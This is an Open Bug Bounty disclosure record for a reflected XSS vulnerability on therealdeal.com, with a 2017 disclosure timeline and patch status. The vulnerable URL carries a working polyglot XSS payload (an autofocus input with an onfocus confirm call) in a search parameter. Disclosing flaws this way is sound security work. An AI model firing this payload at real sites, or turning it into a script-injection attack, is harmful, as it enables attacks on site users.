therealdeal.com XSS vulnerability

2017-08-24T00:31:00
ID OBB:281760
Type openbugbounty
Reporter eb
Modified 2017-11-22T07:27:00

Description

Vulnerable URL:
https://therealdeal.com/new-research/trd-results/?advanced_search=654464645%3C!%27/*!%22/*!\%27/*\%22/*--!%3E%3CInput/Autofocus%20*/;%20Onfocus=confirm(`OPENBUGBOUNTY`)%20//%3E%3CSvg%3E&all;_research=on&trd;_people=on&trd;_company=on&trd;_property=on&trd;_new_development=on&trd;_dealsheet=on&trd;_articles=on&trd;_reports_rankings=on&trd;_industry_reports=on&search;_from_nav_bar=Search#
Details:

Description| Value
---|---
Patched:| Verification in progress
Latest check for patch:| 22.11.2017
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 23362
VIP website status:| Yes
Check therealdeal.com SSL connection:| (Grade: A)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 24 August, 2017 00:31 GMT
Vulnerability existence verified and confirmed| 24 August, 2017 06:47 GMT
Generic security notifications sent to website owner| 24 August, 2017 06:47 GMT
Notification sent to subscribers (without technical details)| 24 August, 2017 10:17 GMT
Vulnerability details disclosed by researcher| 22 November, 2017 07:27 GMT